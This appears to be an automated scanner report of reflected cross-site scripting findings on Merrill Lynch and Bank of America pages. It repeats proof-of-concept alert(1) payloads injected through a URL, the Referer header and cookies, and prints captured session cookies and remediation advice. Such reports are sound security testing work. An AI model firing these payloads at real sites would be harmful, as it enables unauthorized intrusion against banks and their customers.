GET /webcasts/2010/conservatism/video/?%00e906f'-alert(1)-'d27b8e30bf9=1 HTTP/1.1 Host: www.totalmerrill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cmRS=&t1=1290629615462&t2=1290629622849&t3=1290629625312&fti=1290629625311&fn=GWMMktTotalMerrillWhatMatters_aspnetForm%3A0%3B&ac=-1:U&fd=0%3A2%3ASearch_btn%3B&uer=&fu=&pi=GWM%3AMkt%3ATotalMerrill%3BWhatMatters&ho=data.coremetrics.com/eluminate%3F&ci=90010394; SMIDENTITY=ManMRSApMfVqCg2gEn/wcCCTiry10p9BiZfhZaPx4bYEWKW58yF6tzT15FJJQ2FAt4H8k2zJyZJtJG/dc3Ey1zHbBw8IaCzvrRHspWcHDB1CaiAzwtm/tv99NF1V27YTbVLkacReBQ70Q5zoTYIDlFoEKPrNiBcMnl7Hylj1rKO39W60OnvPJYw/8pGkwqkjzX5vJVeiwA4goDU9eiJ3kI3JVQ0SYyaTlWuM1QsN7VaQZi9uYqNjW0QV2eSXHoZ94T/fg5eUph1R3BggynIQvjFaJItV766OpqHscaYnd/Hofgmi2E7Cl7TBO/2Xdzcc2mas3IT0N/SB5XlXib50qQJ07G/ZqaI8YapZ+xImxk/DmZTYzu15dVlJu5Pfv0ju24FDjIV4ayd2BfvEdi9H1zSCNMNLj+cZB9MTCp/WHquxEN+CjORKbhmmykBIzGZcr7hyndo493ao+fjqQ2I7ZGhfODvkmURghPmjf971ztE6Hm2ORbBCi1cADwUWrYq0iMPxRN8k0UmrkxX4fRQVZjfae2wVmXRF2V/wAEOUW2q4IkhdnqftwMLUNlNEHSAtKQzgWln7Ax015VlkRRue354zaJW0U9pks+BZVzrFu/Ewj/yB3DU5+qMJHtN7EEF4; __utmz=15720499.1290629618.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CMAVID=none; cmTPSet=Y; __utma=15720499.1423148302.1290629618.1290629618.1290629618.1; __utmc=15720499; __utmb=15720499.2.10.1290629618; TM_PUID=a2ab9bd9-cdc6-433c-a6b3-026bcadf396d;
Response
HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Length: 16728 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Wed, 24 Nov 2010 20:42:48 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head ...[SNIP]... <script type="text/javascript" language="javascript">g_ml_tm_jsLib_1_0.handleHttpStatusError('IIS', '404;http://www.totalmerrill.com:80/webcasts/2010/conservatism/video/?%00e906f'-alert(1)-'d27b8e30bf9=1', "");</script> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc191"><script>alert(1)</script>f1785281179 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:29:24 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=CT; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1606858411.20480.0000; path=/
<head>
<title>Bank of America | Accessible Banking | About Talking ATMs </title>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0252"><script>alert(1)</script>a773a1fd785 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /help/equalhousing_popup.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; BIGipServerngen-www.80=423999147.20480.0000; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; cookiecheck=enabled; CFTOKEN=380c459%2D0003ce88%2D78cf%2D1ced%2Daea6%2D834712e34552; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; NSC_CbolPgBnfsjdb=445b320a7852; GEOSERVER=2; cmTPSet=Y; CFID=130456778; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17; Referer: http://www.google.com/search?hl=en&q=d0252"><script>alert(1)</script>a773a1fd785
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 20:53:40 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=2963715755.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55fa8"><script>alert(1)</script>e653eecfde7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:29:23 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=CT; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=818329259.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d36e0"><script>alert(1)</script>89b0816890d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:29:26 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=CT; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=432387755.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv ...[SNIP]... <a target="_parent" href="http://www.google.com/search?hl=en&q=d36e0"><script>alert(1)</script>89b0816890d"> ...[SNIP]...
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a83f1'%3balert(1)//0980901f313 was submitted in the BOA_0020 cookie. This input was echoed as a83f1';alert(1)//0980901f313 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_ADVISOR cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a356e'%3balert(1)//b18e1b4f2f5 was submitted in the BOA_ADVISOR cookie. This input was echoed as a356e';alert(1)//b18e1b4f2f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16165'%3balert(1)//c021f906d90 was submitted in the state cookie. This input was echoed as 16165';alert(1)//c021f906d90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0ad2'%3balert(1)//24519b1f39b was submitted in the BOA_0020 cookie. This input was echoed as b0ad2';alert(1)//24519b1f39b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_ADVISOR cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39ffa'%3balert(1)//0872801e8af was submitted in the BOA_ADVISOR cookie. This input was echoed as 39ffa';alert(1)//0872801e8af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99e7d'%3balert(1)//b1baecfd1f6 was submitted in the state cookie. This input was echoed as 99e7d';alert(1)//b1baecfd1f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87615'%3balert(1)//2902fa89fe4 was submitted in the BOA_0020 cookie. This input was echoed as 87615';alert(1)//2902fa89fe4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e51e4'%3balert(1)//1eff54f0062 was submitted in the BOA_0020 cookie. This input was echoed as e51e4';alert(1)//1eff54f0062 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hub/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; BIGipServerngen-www.80=423999147.20480.0000; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; cookiecheck=enabled; CFTOKEN=380c459%2D0003ce88%2D78cf%2D1ced%2Daea6%2D834712e34552; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; NSC_CbolPgBnfsjdb=445b320a7852; GEOSERVER=2; cmTPSet=Y; CFID=130456778; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552e51e4'%3balert(1)//1eff54f0062; throttle_value=17;
The value of the BOA_ADVISOR cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6733d'%3balert(1)//717e92e637c was submitted in the BOA_ADVISOR cookie. This input was echoed as 6733d';alert(1)//717e92e637c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da964'%3balert(1)//6c24456f5dc was submitted in the state cookie. This input was echoed as da964';alert(1)//6c24456f5dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0013'%3balert(1)//030cff673f5 was submitted in the BOA_0020 cookie. This input was echoed as a0013';alert(1)//030cff673f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caeec'%3balert(1)//4940fdee7ab was submitted in the state cookie. This input was echoed as caeec';alert(1)//4940fdee7ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f200d'%3balert(1)//6b2b8d6cf98 was submitted in the BOA_0020 cookie. This input was echoed as f200d';alert(1)//6b2b8d6cf98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
The value of the BOA_ADVISOR cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93c33'%3balert(1)//23cbccd40bf was submitted in the BOA_ADVISOR cookie. This input was echoed as 93c33';alert(1)//23cbccd40bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d50ca'%3balert(1)//0e2e1634c60 was submitted in the BOA_0020 cookie. This input was echoed as d50ca';alert(1)//0e2e1634c60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_ADVISOR cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c75dc'%3balert(1)//6391a24de61 was submitted in the BOA_ADVISOR cookie. This input was echoed as c75dc';alert(1)//6391a24de61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98dda'%3balert(1)//49315c96f27 was submitted in the state cookie. This input was echoed as 98dda';alert(1)//49315c96f27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f67b'%3balert(1)//2d4493c8521 was submitted in the BOA_0020 cookie. This input was echoed as 9f67b';alert(1)//2d4493c8521 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_ADVISOR cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95e8b'%3balert(1)//a513c2a29e0 was submitted in the BOA_ADVISOR cookie. This input was echoed as 95e8b';alert(1)//a513c2a29e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a6d3'%3balert(1)//57c87e31361 was submitted in the state cookie. This input was echoed as 8a6d3';alert(1)//57c87e31361 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1f28'%3balert(1)//17a62d8872d was submitted in the BOA_0020 cookie. This input was echoed as a1f28';alert(1)//17a62d8872d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_ADVISOR cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ca6d'%3balert(1)//74b53c04dca was submitted in the BOA_ADVISOR cookie. This input was echoed as 3ca6d';alert(1)//74b53c04dca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 375f2'%3balert(1)//24389fc2f60 was submitted in the state cookie. This input was echoed as 375f2';alert(1)//24389fc2f60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db9a5'%3balert(1)//1233268eeff was submitted in the BOA_0020 cookie. This input was echoed as db9a5';alert(1)//1233268eeff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_ADVISOR cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c99ef'%3balert(1)//c3b6f72f148 was submitted in the BOA_ADVISOR cookie. This input was echoed as c99ef';alert(1)//c3b6f72f148 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c35a'%3balert(1)//8ab7cc0afd6 was submitted in the BOA_0020 cookie. This input was echoed as 3c35a';alert(1)//8ab7cc0afd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
